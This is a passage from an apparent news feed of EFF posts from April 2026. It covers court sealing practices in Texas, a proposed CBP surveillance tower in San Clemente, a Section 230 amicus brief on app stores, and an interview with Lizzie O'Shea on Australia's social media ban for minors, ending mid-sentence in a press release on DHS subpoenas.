Even now, these newly filed redacted versions conceal significant portions of the parties’ arguments. The public still cannot fully see how this case about technologies that are used every day is being litigated.  Why Public Access Matters  Sealing court records is designed to be rare. To overcome the presumption of public access, litigants must show compelling reasons for secrecy. That’s because open courts are a distinguishing feature of American democracy. The public, journalists, and policymakers all have the right to observe proceedings and hold both government actors and private litigants accountable.  Some filings do contain trade secrets or commercially sensitive information. But that doesn’t mean litigants should be able to hide information without explaining why. The Eastern District of Texas allows litigants to bypass the requirement to explain why. EFF confronted this very same issue in its attempt to intervene in another Eastern District of Texas case, Entropic v. Charter. The same pattern appeared again in Wilus: instead of narrowly tailored redactions supported by specific reasoning, filings were withheld wholesale.  Courts Must Enforce the Standard Courts, not third parties, are responsible for protecting the public’s right of access.  That means enforcing the “compelling reasons” standard, as a matter of course. Parties seeking to seal sensitive information should be required to justify each proposed redaction. The Eastern District of Texas’ current approach falls short. By allowing broad, unsupported sealing through expansive protective orders, it effectively treats judicial records as confidential by default.  Heavy caseloads don’t change the rule. Administrative burden cannot override constitutional and common law rights. Judicial records are presumptively public. Courts, including the Eastern District of Texas, should enforce that presumption.  Other Federal Courts Get It Right  The Eastern District of Texas is an outlier. In the Northern District of California, judges routinely reject overbroad sealing requests. As Judge Chhabria’s Civil Standing Order explains:  [M]otions to seal . . . are almost always without merit. . . . Federal courts are paid for by the public, and the public has the right to inspect court records, subject only to narrow exceptions.  The filing party must make a specific showing explaining why each document that it seeks to seal may justifiably be sealed . . . Generic and vague references to “competitive harm” are almost always insufficient justification for sealing.  This approach reflects the law: sealing must be narrowly tailored and specifically justified. Court Transparency is Fundamental  At first glance, secrecy in patent litigation may not seem alarming. But it signals a broader erosion of transparency. The widespread use of expansive protective orders in the Eastern District of Texas is a practice that risks spreading if courts do not enforce the law.  These practices allow private parties to obscure information about disputes involving technologies that shape modern life. That undermines a core principle of a free society: transparency regarding the actions of powerful actors.  Courts are not private forums for business disputes. They are public institutions, and their records belong to the public.  So long as these practices continue, EFF will keep advocating for transparency and working to vindicate the public’s right to access court records.

  • California Coastal Community Must Reject CBP's AI-Powered Surveillance Tower
    by Dave Maass on April 24, 2026 at 8:04 pm

    Customs and Border Protection (CBP) is seeking permission from the California city of San Clemente to install an Anduril Industries surveillance tower on a cliff that would allow for constant monitoring of entire coastal neighborhoods.  The proposed tower is Anduril's Sentry, part of the Autonomous Surveillance Tower (AST) program. While CBP says it will primarily monitor the coastline for boats carrying migrants, it will actually be installed 1.5 miles inland, overlooking the bulk of the 62,000-resident city. By CBP's own public statement, the system–which combines video, radar, and computer vision–is "constantly scanning" for movement and identifying and tracking objects an AI algorithm decides are of interest. Depending on the model–the photos provided by CBP indicate it is a long range maritime model–the camera could see as far as nine miles, which would cover the entire city and potentially see as far as neighboring Dana Point. "The AST utilize advanced computer vision algorithms to autonomously detect, identify, and track items of interest (IoI) as they transit through the towers field of view," CBP writes in a privacy threshold analysis. "The system can determine if an IoI is a human, animal, or vehicle without operator intervention. The system then generates and transmits an alert to operators with the location and images of the IoI for adjudication and response."  On April 28, local residents and Oakland Privacy, a privacy- and anti-surveillance-focused citizens’ coalition, are holding a town hall to inform the public about the dangers of this technology. We urge people to attend to better understand what's at stake.  "The planned deployment of an Anduril tower along a heavily used Orange County coastline 75 miles from the border demonstrates that the militarization of the border region is rapidly moving northwards and across the entire state," writes Oakland Privacy.  City officials raised concerns about resident privacy and proposed that a lease agreement include a prohibition on surveilling neighborhoods. CBP rejected that proposal, instead saying that they would configure the tower to "avoid" scanning residential neighborhoods, but the system would remain capable of tracking human beings in residential areas. According to the staff report:  In response to privacy concerns, CBP has stated the system would be configured to avoid scanning residential areas that fall into the scan viewshed, focusing the system on the marine environment. CBP has maintained the purpose of the system is specifically maritime surveillance, and the system would be singularly focused on offshore activities. However, there may be an instance in which there is an active smuggling event, detected by the system at sea, in which the subsequent smuggling event traverses through the residential neighborhoods. In such a case, the system may continue to track and monitor. To restrict this functionality would be contrary to the spirit and intent of the deployment. Therefore, they cannot make such a contractual obligation. The Anduril towers retain a variety of data, including images and more.  The proposed Anduril surveillance tower. Source: City of San Clemente "The AST capture and retain imagery which occurs in plan view of the tower sites and is stored as an individual event with a unique event identified allowing replay of the event for further investigation or dismissal based on activity occurring," according to the private threshold analysis. The document indicates a potential 30-day retention period for imagery, but then contradicts itself to say that data will be held indefinitely to train algorithms: "AST will also be maintaining learning training data, these records should not be deleted." This means that taxpayers would be paying for the privilege of having their data turned into fuel for Anduril's product. In 2020 CBP said it would work with National Archives and Records Administration (NARA) to develop a retention schedule for training data (i.e., a timeline for deletion). However, when EFF filed a Freedom of Information Act (FOIA) with NARA, the agency said there were no records of these discussions. Likewise, CBP has not provided records in response to the FOIA request EFF filed with them seeking the same records.  Anduril Maritime Sentry in San Diego, where the border fence meets the ocean. This would not be the first CBP tower placed along the coastline in California. EFF identified one in Del Mar, about 30 miles from the border, and another in San Diego County where the border fence meets the Pacific Ocean. CBP has also applied to place towers–although not necessarily the Anduril model–in or near several other coastal locations: Gaviota State Park, Refugio State Park, Vandenberg Air Force Base, Piedras Blancas and Point Vicente. The California coastline isn’t the only coastline dotted with surveillance towers. The Migrant Rights Network has also documented numerous Anduril towers along the southeast coast of England. Where the San Clemente tower would differ is that there is a substantial population between the tower and the beach, and because it's a 360-degree system, it can watch neighborhoods even further from the coast.  However, this won't be the first time an Anduril tower has been placed next to a community. EFF has documented numerous Anduril towers in public parks along the Rio Grande in Laredo and Roma, Texas. In Mission, Texas, an Anduril tower was placed outside an RV park: the tower could not even see the border without capturing data from the community. Because AI can swivel the cameras 360 degrees, two churches were within the "viewshed" of that tower.  Click here to view EFF's ongoing map of CBP surveillance towers. Many border surveillance towers are placed on city or county property, requiring a lease to be approved by the local governing body–as is the case with San Clemente. In 2024, EFF and Imperial Valley Equity and Justice organized an effort to fight the renewal of a Border Patrol's lease for a tower next to a public park. The coalition lost narrowly after a recall election ousted two officials who were critical of the lease. CBP is rapidly increasing the number of towers at the border and beyond, recently announcing the potential to install 1,500 more towers in the next few years–more than tripling what we've documented so far–at a cost of more than $400 million to the public for maintenance alone. This is despite more than 20 years of government reports that have documented how tower-based systems are ineffective and wasteful. It's time to fight back. 

  • EFF to 9th Circuit (Again): App Stores Shouldn’t Be Liable for Processing Payments for User Content
    by Sophia Cope on April 23, 2026 at 10:05 pm

    EFF filed an amicus brief for the second time in the U.S. Court of Appeals for the Ninth Circuit, arguing that allowing cases against the Apple, Google, and Facebook app stores to proceed could lead to greater censorship of users’ online speech. Our brief argues that the app stores should not lose Section 230 immunity for hosting “social casino” apps just because they process payments for virtual chips within those apps. Otherwise, all platforms that facilitate financial transactions for online content—beyond app stores and the apps and games they distribute—would be forced to censor user content to mitigate their legal exposure. Social casino apps are online games where users can buy virtual chips with real money but can’t ever cash out their winnings. The three cases against Apple, Google, and Facebook were brought by plaintiffs who spent large sums of money on virtual chips and even became addicted to these games. The plaintiffs argue that social casino apps violate various state gambling laws. At issue on appeal is the part of Section 230 that provides immunity to online platforms when they are sued for harmful content created by others—in this case, the social casino apps that plaintiffs downloaded from the various app stores and the virtual chips they bought within the apps. Section 230 is the foundational law that has, since 1996, created legal breathing room for internet intermediaries (and their users) to publish third-party content. Online speech is largely mediated by these private companies, allowing all of us to speak, access information, and engage in commerce online, without requiring that we have loads of money or technical skills. The lower court hearing the case ruled that the companies do not have Section 230 immunity because they allow the social casino apps to use the platforms’ payment processing services for the in-app purchasing of virtual chips. However, in our brief we urged the Ninth Circuit to reverse the district court and hold that Section 230 does apply to the app stores, even when they process payments for virtual chips within the social casino apps. The app stores would undeniably have Section 230 immunity if sued for simply hosting the allegedly illegal social casino apps in their respective stores. Congress made no distinction—and the court shouldn’t recognize one—between hosting third-party content and processing payments for the same third-party content. Both are editorial choices of the platforms that are protected by Section 230. We also argued that a rule that exposes internet intermediaries to potential liability for facilitating a financial transaction related to unlawful user content would have huge implications beyond the app stores. All platforms that facilitate financial transactions for third-party content would be forced to censor any user speech that may in any way risk legal exposure for the platform. This would harm the open internet—the unique ability of anyone with an internet connection to communicate with others around the world cheaply, easily, and quickly. The plaintiffs argue that the app stores could preserve their Section 230 immunity by simply refusing to process in-app purchases of virtual chips. But the plaintiffs’ position fails to recognize that other platforms don’t have such a choice. Etsy, for example, facilitates purchases of virtual art, while Patreon enables artists to be supported by memberships. Platforms like these would lose Section 230 immunity and be exposed to potential liability simply because they processed payments for user content that a plaintiff argues is illegal. That outcome would threaten the entire business models of these services, ultimately harming users’ ability to share and access online speech. The app stores should be protected by Section 230—a law that protects Americans’ freedom of expression online by protecting the intermediaries we all rely on—irrespective of their role as payment processors.

  • Speaking Freely: Lizzie O'Shea
    by Jillian C. York on April 23, 2026 at 7:56 pm

    Lizzie O’Shea is an Australian lawyer, author, and the founder and chair of Digital Rights Watch, which advocates for freedom, fairness, and fundamental rights in the digital age. She sits on the board of Blueprint for Free Speech, and in 2019 was named a Human Rights Hero by Access Now. Interviewer: Jillian York Jillian York: Hi, good morning, or rather, good evening for you. Lizzie O’Shea: Hi Jillian, it's great to be here.  JY: I'm going to start with asking a question that I try to kick off every interview with, which is, what does free speech or free expression mean to you? LO: Yes, so Digital Rights Watch, which is the organization I founded and I chair, is focused on fundamental rights and freedoms in the online world. And so freedom of speech is obviously a big part of that. It's obviously a very vexed right, partly because of its heritage and interpretation in places like the United States, which sometimes sits in contrast culturally to other parts of the world. Certainly, if you ask Australians about it, they do not want to have a culture of free speech that looks like the United States.  Australians understand that freedom of expression is a really important component of democracy. So one of my jobs is to make the claim that curtailing freedom of speech, including in online settings, can have a real impact on democracy. And I think that's fundamentally true, and you don't want to wait until it's too late to be able to make that argument, to ensure that the policies are in place to protect that freedom. So I think it's a really important freedom. It's got a vexed history and expression in the modern online world, but many people still instinctively understand that those in power see speech as something that is important to challenging their authority, and so it can be a really important place to fight back and protect democracy and other rights from being impacted by those who hold power at the moment. JY: I want to ask you about your book. You're a critic of techno-utopianism. Your book, Future Histories, came out right before the pandemic, if I recall, and it looks to the past for lessons for our technological and cultural future. I really appreciated your take on Elon Musk. So I guess what I want to ask you about is two things. What, in your view, has changed since you wrote it? LO: Yeah, that's a really interesting question. I must admit, I was thinking about it the other day whether some of what I wrote really holds up. And I think the fundamentals are still true, in the sense that I still believe that a lot of the discussions and debates we have about technology today are presented as fundamentally novel when they are very old, ancient discussions and debates about how power should be distributed through society, and how technology enables that kind of power distribution or works against it, right? So I feel like that fundamental analysis, whatever contribution to the field, is still valid, of course. In some ways though, those technical systems have become more opaque, like the artificial intelligence industry and how that's been built off the back of years of exploitation of personal information and centralization of power in technology companies. Those things have become more powerful and concentrated and difficult to understand—if you're not deep in the weeds—beyond an instinctive understanding that something's going a bit wrong, perhaps.  So in some ways those trends have exacerbated things in ways that I think many other contributors, yourself included, have brought a really important set of analyses to these discussions. More generally, though, one of my fundamental understandings of how I frame some of these arguments is that there are two sources of power, right? Government power and corporate power that really shape how the online world is developing. And post-pandemic, there's a lot greater skepticism, criticism, and outright distrust of government authorities seeking to do work to protect people from some of those corporate excesses. Now that's obviously something that is much more part of American culture as opposed to European culture, and in Australia, we sit somewhere in between. But that skepticism and that mistrust of institutions, I don't know that that serves us well. I'm somebody who does treat with criticism policies put forward by government, because I think it's our job as civil society people, as people part of a social movement that want to have rights at the center of our society, to be critical of those in power and make sure that they're being held accountable. But that mistrust has fundamentally shifted how possible it is to do that in an effective way. And I think that poses real challenges for people who want to see government policy look different to how it is and how you can bring people into a sense of trust, investing in a democratic rights based society, rather than rejection and cynicism being the overriding, overriding kind of factor in how they shape their political arguments. Which is a real challenge, I think, for people like us who rely on some of that mistrust and skepticism in order to fuel the fire of some of these campaigns, but do want to see people still invested in democratic processes. JY: Yeah, absolutely. So speaking of policies, you're in Australia, where the government's enacted some of the strictest social media laws for minors in the world, I would say. In one of our most recent interviews, which was with Jacob Mchangama, we talked about how the comparison of social media to Big Tobacco is spreading, and this idea that there's no utility in social media for minors, that it's a net harm. I'm curious what your thoughts are on that, and then we can dive into the more nitty gritty bits of the Australian law. LO: I think that's a great place to start, because the overwhelming sense in how this policy was presented to the public in Australia is that this is a very dangerous place for young people to be, and that desperate times call for desperate measures. “We don't have time to fix these spaces. We need to just restrict access.” It's described as a delay. Many, including me, describe it as a ban for under 16 year olds. So what has been very interesting in this discussion is who's been left out of the conversation. And if you talk to young people—and there are many organizations working with young people—and you talk to them about what they use social media for, they often say that they wish adults understood that they used it for different reasons, or they're scared about different things than what adults think they might be scared of. And so that kind of fundamental failure of communication, which I suppose is not a surprise, when these people don't actually have the power to vote, have the power to do things a normal legal person would do, is somewhat unsurprising. But when you're making policy about these people, that can be quite impactful, it can have very detrimental impacts. And if you take a human rights approach, that is your job to think about the negative impact on human rights, and what you're going to do about it, it's not really good enough. And this has been an experiment that Australia has led on, very much, looking for headlines, for a perception of boldness. Some of that claim is legitimate in the sense that they want to be seen to be taking action, and a lot of people feel very concerned that governments aren't prepared to take action against big tech companies. So, some of that is a valid feeling. But I think in this context, we lose so much when we don't actually listen to the people affected, and listen to the myriad ways in which they use social media. Some things they're concerned about, some things they find harmful, some things they're really sick of. But there's so many ways in which they use it to find a sense of community, to find a sense of empowerment, to talk to people they would never otherwise be able to access, sometimes because they're isolated, socially, geographically, whatever it may be, and it's so disappointing to me that that kind of part of the conversation was not had as we debated this particular policy. JY:  So, what do you think some of the harms are for youth who can't access social media? What are young people losing out on? Who is harmed by these laws? LO:  It's a great question. When we do a human rights analysis, we have to think about who's harmed by a particular policy, even if we think it's overall justified on a utilitarian ground, say it's better off for everyone overall who's harmed, is a really important question, and so much of that has been absent from this discussion. So it's not just me. It's like hundreds and hundreds of experts in Australia and organizations that represent many, many people, have provided commentary and input into this process and expressed many concerns about this policy, and there's a few different ways in which people are harmed.  So the first thing, of course, is that if you require that age verification occur, you're engaging in a privacy violation for many people, there are cyber security risks with collecting that kind of information. There's deterrent effects and the like. Now that may not concern you, or you may think that's a justifiable kind of infringement on privacy rights, but I think that's worth mentioning. It is quite significant, especially in a world in which age verification doesn't tend to work very well on any measure. There are very serious cybersecurity risks that have been associated with age verification processes and the like. So it's certainly not nothing. The other set of people that are harmed are particularly vulnerable people.  There's a variety of people who are still accessing social media. So it looks like about seven in ten of young people on the early data who had social media accounts are still accessing social media now. Now these are early figures, so there's a lot to be said for looking at how this works in a year's time, for example. But I think one of the interesting things to think about is when those people, young people, who are on still on social media—in breach of this ban or in defiance of this ban, however you want to put it—might need to engage in help seeking behavior, there may be a deterrent there, because they know that the law is they're not supposed to be accessing social media. So that is a selection of young people that we're particularly concerned about. And then, more generally, of course, there's a whole cohort of people who are particularly vulnerable. Maybe they're LGBTIQ, maybe they're in an isolated geographic area, far away from a city. Maybe they're experiencing harm at home and have no one to talk to about it. There's all sorts of ways in which young people use social media to manage their own challenges, harms, difficulties, and very effectively. They find people to talk to about their problems when other people may not be available to them. And that is an issue that is hard to map, right? We know that there's been an increase in calls to things like Kids Helpline, which does what it says on the tin. So those kinds of things have seen an increase. But I think that is something that is harder to map, but still very, very important, and may result in people going to other parts of the internet as well to seek help in different ways that might also not be very safe for them.  More generally it's worth remembering that if platforms can say with some confidence, from a policy perspective, that young people are no longer on their platform, there is less incentive to design for them as well, which is another associated problem. Now, it remains unclear as to how platforms are dealing with that issue, especially in light of the most recent data, which suggests that a lot of young people remain on the platforms. But that's an issue. Do we then allow platforms to no longer design in a way that respects the autonomy of young people, the safety of them, their security and the like, because they have special needs and interests and all those sorts of things. So that's another problem. There's lots of operational problems. There's lots of conceptual ones. I don't think many of these have been considered or accounted for in the process. JY: Absolutely, those are the same things that worry me as well. Okay, let's talk about the campaign. So what has the pushback to this, to the law, looked like, and what changes were you calling for? LO: Well, if I can Jillian, what I might start with is where the push came from. Because I think that's quite instructive. One of the key sets of institutions that were pushing for this ban were mainstream news organizations, and we're learning a bit more about this over time, but the Murdoch press and other large news organizations in Australia—Australia has one of the most concentrated media environments in the world—were pushing for this ban. There was a petition run on one of their websites that was gathering tens of thousands of signatures. There were also others. Then there was a lot of advocacy towards specific kinds of political leaders in the country, and then a kind of competitive race to see who could be the most extreme in terms of putting forward a policy. But it's certainly the case that this very powerful set of actors in our democracy, at least, were a key driver of this campaign for a social media ban for young people. Now, I think there's a sense of moralism about it, a sense of desperation about it, tapping into genuine fears from parents, you know, and the like. And you know, The Anxious Generation, the book by Jonathan Haidt, has obviously been very influential with many people, but the research is still a bit unclear, right? About what this all means. And lots and lots of researchers will tell you that that book isn't making a reasonable argument based on the data that we have, right? So, it's a very febrile environment for this kind of discussion, and those kinds of institutional actors were incredibly important in getting this on the political agenda. We then had an electoral campaign, definitely a vision that conservative politics would push for this. So labor politics, you know, center left politics pushed for it, and won the election, right? Not on this issue alone, but it was in that environment in which this policy was developed. There was a very small amount of time for submissions, for policy discussion about it. Initially, the government had said they weren't going to do it because they were concerned that the age verification technology wasn't up to scratch. That changed very, very quickly, and then the policy was introduced. I think it was in six days, some very small amount of time. So many different child rights organizations, academics, institutions, filed policy submissions to discuss this, did a lot of advocacy work, but the passage of time between the announcement of the proposal and the passage of the legislation was extremely short, and what followed has been a year of discussion around whether this was a good thing, a year of testing age verification technology, often finding it wanting, but setting up a set of of preferred providers that platforms could use in order to satisfy the legislative requirements. A lot of lobbying from platforms as to whether they're in or out. There was a big discussion about whether YouTube should be in or out. And a lot of back room dealing between relevant politicians and big tech companies. So the whole thing is very unseemly, and we're now in the world where it's been introduced, a lot of failure for it to actually operationalize now. Now, it may be that that changes over time, but that's quite telling, right?  It's telling also because I don't think all parents particularly like this proposal either. It's very popular, but there's certainly a section of parents that are facilitating their children's continued access to social media. And I think that's interesting in itself. Part of what it is—something we were talking about actually earlier in our conversation—people don't like governments telling them how to parent their children. That has taken some very negative expressions in parts of the world, you know, resistance to things like the availability of medicine and treatment for kids who might be trans. But in this context, it's like, “I'm not going to let the government tell me that I can't let my kid on social media.” So, I don't think it's clarified much in the debate in terms of understanding how platforms behave towards young people, what they could do better, of which there's many things, and then how we get to the world in which children are able to be online but better protected. I'm not sure this proposal has contributed to that. It's really muddied the waters about what the government is capable of doing, what it should be doing, and what platforms, you know, what should be the process that platforms go through when thinking about designing for children. JY: That's such a great answer. Thank you. And actually, that brings me to another question, which is so in your ideal world, taking this law, being able to throw it out the window if you want…What would you what would you want to see, not just from social media, but from from the platforms, from governments, both for the sake of youth, but also, you know, for all of us. LO: I think that is the exact right question to be asking, and it's a good time that we've managed to talk now, because actually, in the interim, what's come out is at the first draft that we've got of a Children's Online Privacy Code. And to me, that is really revealing, because it is designed to apply to all services that might be accessed by children, like all online services, and it has a really kind of sophisticated understanding of what consent might look like, where you need help with getting consent, when it comes to parents or adults that are supportive in your life. And then at different ages that might look a bit different, like you might get notified if consent has been refused by your caregiver, for example, if you've wanted to do something. So there's a more sophisticated understanding of what consent looks like, and a range of different restrictions on when private, when personal information can be collected and used. It's got things in it that I don't particularly like. I would like to see a prohibition on the commercial exploitation of children's personal information, because I don't think any targeted advertising is justified, for example. And I think that kind of measure of that commercial exploitation is hugely problematic. I think we have to think about what deletion looks like. I think you should have a right to deletion, for example. But you know, we also have to respect that children grow into young adults, that making decisions at 16 might look quite different to when they're three. So what you do with their personal information, how they carry that forward into their adult lives might be different depending on the age and so that kind of privacy reform actually is the fundamental thing. I’m sure your listeners don’t need reminding of this. That is my favorite right. Because I think restricting access to personal information is a rights-respecting way to improve the online environment for everybody. And what I think is really interesting about this Children's Online Privacy Code that is still in draft form, is that all these things should be available to adults as well. Like adults in Australia don't have the right to deletion at the moment. We don't have a right to comprehensively know where our information has traveled and to delete it. You know, look, we have fewer rights than Californians, for example, certainly fewer rights than Europeans. What this code has highlighted is that, in fact, all people should be enjoying this kind of protection that comes from restricting access and use of personal information and giving people more control over that, because that personal information is the raw material of the business model, and it leads to a very loose approach to its collection and leads to many negative downstream consequences, I would argue, including business models that prioritize engagement, that prioritize and monetize polarizing, extremist content, mis- and disinformation. I think we could have a real crack at trying to ameliorate some of these problems, or certainly reduce their impact, if we started that fundamental raw material that fuels the business model. So that, I think, is a really telling alternative that we're now considering as a society, and I like to think that people will come to an understanding that you can you can find ways to elevate improve the online world, particularly for young people, without restricting their access to that online world in a way that is empowering for them, rather than patronizing or infantilizing.  JY: I completely agree, and I think it's funny that people often see privacy and expression at odds with each other, when actually I think privacy enhances expression. LO: I think it makes spaces safer, makes people freer to be able to say what they think, but also to have those discussions in ways that are more meaningful, that can help find connections, even across divisions, rather than exploiting that division for profit, which is so much of the current business model. JY: Are there any other things happening in Australia that EFF’s readers should know about? LO: Well, we're about to go through the second tranche of our privacy reform. So we did engage in our first tranche of privacy reform. We have a Privacy Act that was passed in 1988 and hasn't been meaningfully updated in the decades since. So we got a few small changes, which included the enabling provision to allow a Children's Online Privacy Code to be developed, which is why we're getting the benefit of that now. But we're about to see a range of different privacy laws introduced. What the content is, of course, will be the subject of a lot of discussion and debate. We're going to argue for the right to deletion, the right to a private right of action for privacy harms, better processes for consent, and improved definitions of personal information to really bring Australia in line with lots of other similar jurisdictions around the world. And we're really keen to advance that for all the reasons that I just mentioned.  The other big change that I think is coming is that, you know, which is perhaps more on topic for this conversation, is that we've had this online safety policy that is constantly being touted as the first in the world, and world leading and this and that, and it's really been a very flawed and vexed process working out how we could develop codes that were designed to govern how certain services were provided in the digital age, in line with safety expectations. There’s been a lot of focus on complaints and take down notices and things like that, there's obviously been that vexed litigation with Elon Musk, trying to get him to take down a particular video, and ultimately, the failure of our regulators to succeed on that front, I think, probably correctly, because giving a regulator in Australia the right to take down content from anywhere in the world seems to me a very concerning development, if that was allowed to proceed. So this history of online safety, it's been a big part of successive Australian governments’ identities. We're about to see the introduction of a digital duty of care. So that's certainly the stated position of government. What that looks like in practice, I think will be really interesting.  I like the idea of a digital duty of care. I like the idea of a flexible, overarching concept. What the content is, though, will be really important. So what I would like to see is proactive disclosure of harm or risk of harm, and then actions taken by platforms to do it. So more onus on platforms to provide transparency about what they know about how their online spaces are being used and what might be harmful. I mean, there's a question around whether we'll see an introduction of a civil right, something similar following from the litigation that’s taken place in California and New Mexico, and that is going to be leading, really, multiple claims that are being made all around the country in the US, against companies like Meta and Google and other social media platforms. So I think there may be a flow-on effect from that, as in, it might turn into a civil right to sue for failure to meet the requirements of digital duty of care. But I'm really interested to hear from any of your listeners, or anyone who's working in this space about what the content should be of that digital duty of care, because there's obviously limits as well. Like it can be not rights-respecting, and we're interested in making sure that's not the case. And I think there's probably a range in which it could be more protective or less and working out how to do that—there are examples from around the world, but that's going to be something I reckon we could use help with that we want to get right and make use of that opportunity as best we can.  The last thing I'll say, I suppose, is that our government is always looking for ways to deal with mis- and disinformation, and that comes with real risks of censorship. And so, I think there's a strong argument to focus on privacy reform, because it's a rights-respecting reform as an antidote to mis- and disinformation. Greater transparency on platforms—I think about how they prioritize content in your feed, for example, can be useful, or reporting on what content is really popular, like ad libraries. There's all sorts of ways in which we can introduce greater transparency, but I do worry that as governments around the world feel emboldened to do so, they might look for more ways to to remove content, to be more involved in content moderation policies that have the real potential to to become censorship if we're not careful. So that's the other abiding concern I've got about Australian policy at the moment. JY: One of my big concerns now too, is all of these authoritarian governments watching Australia, watching the UK, and enacting laws that are modeled on, but much more severe than than the ones in those places? Do you share that concern?  LO:  Yeah. I mean, the other way in which it's come about in Australia, certainly like anti-doxxing laws, which, at the moment, we've got laws on our books that came about attached to a privacy reform. I'm hesitant to say it's a privacy reform, because it's not, but it's very egregious. It's a criminal offense to disclose basic details about someone online, if it's done with a set of intents and the like, about their particular status as a group, and that, I think you could drive a truck through in terms of how you could interpret it, right? There's such a wide variance, and bringing a proceeding against someone like prosecuting them for that is such a life altering experience. And I think if governments did want to focus on particular activists. And I'm particularly thinking of, you know, the way it was framed was certainly around the the discussion and debate about the genocide unfolding in Gaza. Like, I think, particularly about that movement, they're very vulnerable to crackdowns by government for speech that is perceived to be unacceptable by government.  And I'm not even trying to debate it. I think there's certainly antisemitic commentary occurring in Australia, and indeed, there have been some people, like genuine Nazis arrested, which, you know is, is a different kettle of fish. But I think progressive movements, not just the defense of Palestine movement, but lots of other progressive movements are a particular risk of those kinds of laws. But I think mis- and disinformation is the other vehicle. So we have to be very careful about giving platforms, giving regulators both the mandate and then the authority to police content based on particular criteria. And often what they talk about, or they talked about in proposals that have now died in Australia, were things like public health issues. So, you know, that's a particular consent that drives a lot of people who are very concerned about the years of Covid up the wall. So it inspires a lot of reaction to it. But I think there's lots of ways in which undermining political stability is put forward as a proposal, as a justification for removing content. That's just so broad that I think you could really start to see censorship. It's just not good enough. I just don't think we can tolerate those kinds of proposals. I like to think that's not the case in Australia, but I just think there's a tendency among governments now to see this as an opportunity. It's an anxiety lots people have about mis- and disinformation, and so they draw on that as a mandate to act. And I think we should be very cautious about those proposals. JY: Definitely. Okay, I’m going to ask the final question that I ask everyone. Who is your free speech or free expression hero? Or someone from history, or even someone personal who has influenced you? LO: There’s a chapter in my book where I talk about the Paris Commune, which happened a long time ago, but I still think it’s a really interesting experiment in applied democracy. This is when a bunch of communauts took over Paris and started doing things differently in a variety of different ways. Gustave Coubert is this artist who’s leading the artist collective during this time, and I always found him entertaining because he would paint things that weren’t expected. So, often, nudes that were considered quite scandalous because they were everyday women who weren’t angelic or Madonna-esque in their style, but he’s got a very famous painting of female genitalia— JY: Yes! Facebook took it down! [laughs] LO: Exactly. It’s always been a very confrontational image. People find it sexist sometimes, because they think it’s very pornographic. I understood it differently. It’s called “The Origin of the World,” so I sort of see it as a force of giving life. Interpret however you like, the point is that Facebook couldn’t tolerate it and took it down. There’s a nice little bit of litigation where a schoolteacher had a page where he was teaching people that art, and Facebook could just not tolerate this art. In my mind, it was so telling that a communaut from hundreds of years before was basically revealing, as an expert troll almost, how conservatives—someone like Mark Zuckerberg—view, and how he shapes these platforms. And how they subtly reshape what we think is appropriate, what we think is free, what we think is within the realms of good society. And that you really do need artists telling you that that might not be true, and they’re some of the most effective actors at revealing that about those who hold power, like reshaping our understanding about what acceptable debate is, and how we can show power to be exercised in our online world, where in other circumstances it might be quite okay. I love that story, and I love the communauts. There’s a lot of beautiful writing about them, there’s a beautiful book called Communal Luxury where they talk about all the different ways in which they were trying to reimagine their society and do it collectively, from things like having the first union of women but also having the design of clothes and furniture look different. I want to see a world in which people take that power in both the micro and macro and start to reshape their society in really creative ways. And I feel like digital technology has the real capability of allowing that to occur and I want to revive that sense of concrete democracy rather than just delegated democracy or deferred representative democracy where you tell someone else what you want but don’t have a say in a lot of decisions. And so, that really grassroots idea of democracy is something, and I think we’re in a world in which that could really occur with the assistance of digital technology. It’s a matter of working out how to bring it into being. And that’s what I see this movement as doing. People with digital rights as being their primary concern are trying to recreate that world so that there’s more communal, collective spaces for discussing what the future should look like.

  • Stop The Fraud: The Government Hates Competition
    by Daniel McAdams on April 23, 2026 at 5:00 pm

    To say that the U.S. federal government is ‘a little less than truthful’ would be the understatement of the century. It’s expected that politicians bend the truth. When it comes to power and money, the incentive to lie is always there; and it’s very often chosen. But lying can turn into an addiction … a The post Stop The Fraud: The Government Hates Competition appeared first on LewRockwell.

  • 📁 How ICE Got My Data | EFFector 38.8
    by Christian Romero on April 22, 2026 at 6:25 pm

    When we use the internet, we're entrusting tech companies with some of our most private information. These companies have promised they'll keep our data safe. But what happens when the government comes knocking at their doors? In our latest EFFector newsletter, we hear from an EFF client whose data was given to ICE after Google broke its promise to him. JOIN OUR NEWSLETTER For over 35 years, EFFector has been your guide to understanding the intersection of technology, civil liberties, and the law. This latest issue covers the ongoing fight to reform NSA surveillance, the many attempts to censor 3D printing, and the cost of Google's broken promise to its users. Prefer to listen in? EFFector is now available on all major podcast platforms. This time, we're chatting with EFF Senior Staff Attorney F. Mario Trujillo about how state attorneys general can hold Google accountable for failing to protect users targeted by the government. You can find the episode and subscribe on your podcast platform of choice: %3Ciframe%20height%3D%22200px%22%20width%3D%22100%25%22%20frameborder%3D%22no%22%20scrolling%3D%22no%22%20seamless%3D%22%22%20src%3D%22https%3A%2F%2Fplayer.simplecast.com%2Feb78b9d6-fbcf-453f-b55e-77c575b638ef%3Fdark%3Dfalse%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from simplecast.com     Want to help us hold companies accountable? Sign up for EFF's EFFector newsletter for updates, ways to take action, and new merch drops. You can also fuel the fight for privacy and free speech online when you support EFF today!

  • EFF Sues DHS and ICE For Records on Subpoenas Seeking to Unmask Online Critics
    by Hudson Hongo on April 22, 2026 at 3:51 pm

    Agencies Ignored EFF’s Public-Records Requests Regarding Unlawful Efforts to Locate People Who Criticized the Government or Attended Protests.SAN FRANCISCO – The Electronic Frontier Foundation (EFF) sued the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE) today demanding public records about their use of administrative subpoenas to try to identify their online critics.Court records and news reports show that in the past year, DHS has used administrative subpoenas to unmask or locate people who have documented ICE's activities in their community, criticized the government, or attended protests. The subpoenas are sent to technology companies to demand information about internet users who are often engaged in protected First Amendment activity.These subpoenas are dangerous because they don’t require judges’ approval. But they are also unlawful, and the government knows it. When a few users challenged them in court with the help of American Civil Liberties Union affiliates in Northern California and Pennsylvania, DHS withdrew them rather than waiting for a decision.DHS and ICE have ignored EFF’s public-records requests for documents about the processes behind these subpoenas, so EFF sued Wednesday in the U.S. District Court for the District of Columbia.“DHS and ICE should not be able to first claim that they have the legal authority to unmask critics and then run from court when users challenge these administrative subpoenas,” said EFF Deputy Legal Director Aaron Mackey. “The public deserves to know what laws the agencies believe give them the power to issue these speech-chilling subpoenas.”An administrative subpoena cannot be used to obtain the content of communications, but they have been used to try and obtain some basic subscriber information like name, address, IP address, length of service, and session times. If a technology company refuses to comply, an agency’s only recourse is to drop it or go to court and try to convince a judge that the request is 